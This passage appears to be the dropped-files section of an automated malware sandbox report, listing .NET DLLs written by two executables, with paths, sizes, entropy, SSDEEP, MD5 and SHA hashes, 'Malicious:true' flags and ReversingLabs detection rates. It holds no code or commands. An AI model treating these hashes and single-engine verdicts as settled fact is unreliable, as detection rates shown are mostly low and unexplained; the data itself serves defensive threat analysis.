                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33280
                                                  Entropy (8bit):5.634433516692816
                                                  Encrypted:false
                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):342528
                                                  Entropy (8bit):6.170134230759619
                                                  Encrypted:false
                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):36352
                                                  Entropy (8bit):5.668291349855899
                                                  Encrypted:false
                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):64000
                                                  Entropy (8bit):5.857602289000348
                                                  Encrypted:false
                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33280
                                                  Entropy (8bit):5.634433516692816
                                                  Encrypted:false
                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):36352
                                                  Entropy (8bit):5.668291349855899
                                                  Encrypted:false
                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                  Malicious:true
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):342528
                                                  Entropy (8bit):6.170134230759619
                                                  Encrypted:false
                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):36352
                                                  Entropy (8bit):5.668291349855899
                                                  Encrypted:false
                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33280
                                                  Entropy (8bit):5.634433516692816
                                                  Encrypted:false
                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):46592
                                                  Entropy (8bit):5.870612048031897
                                                  Encrypted:false
                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):342528
                                                  Entropy (8bit):6.170134230759619
                                                  Encrypted:false
                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                  Malicious:true
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):64000
                                                  Entropy (8bit):5.857602289000348
                                                  Encrypted:false
                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):342528
                                                  Entropy (8bit):6.170134230759619
                                                  Encrypted:false
                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):46592
                                                  Entropy (8bit):5.870612048031897
                                                  Encrypted:false
                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):36352
                                                  Entropy (8bit):5.668291349855899
                                                  Encrypted:false
                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):70144
                                                  Entropy (8bit):5.909536568846014
                                                  Encrypted:false
                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
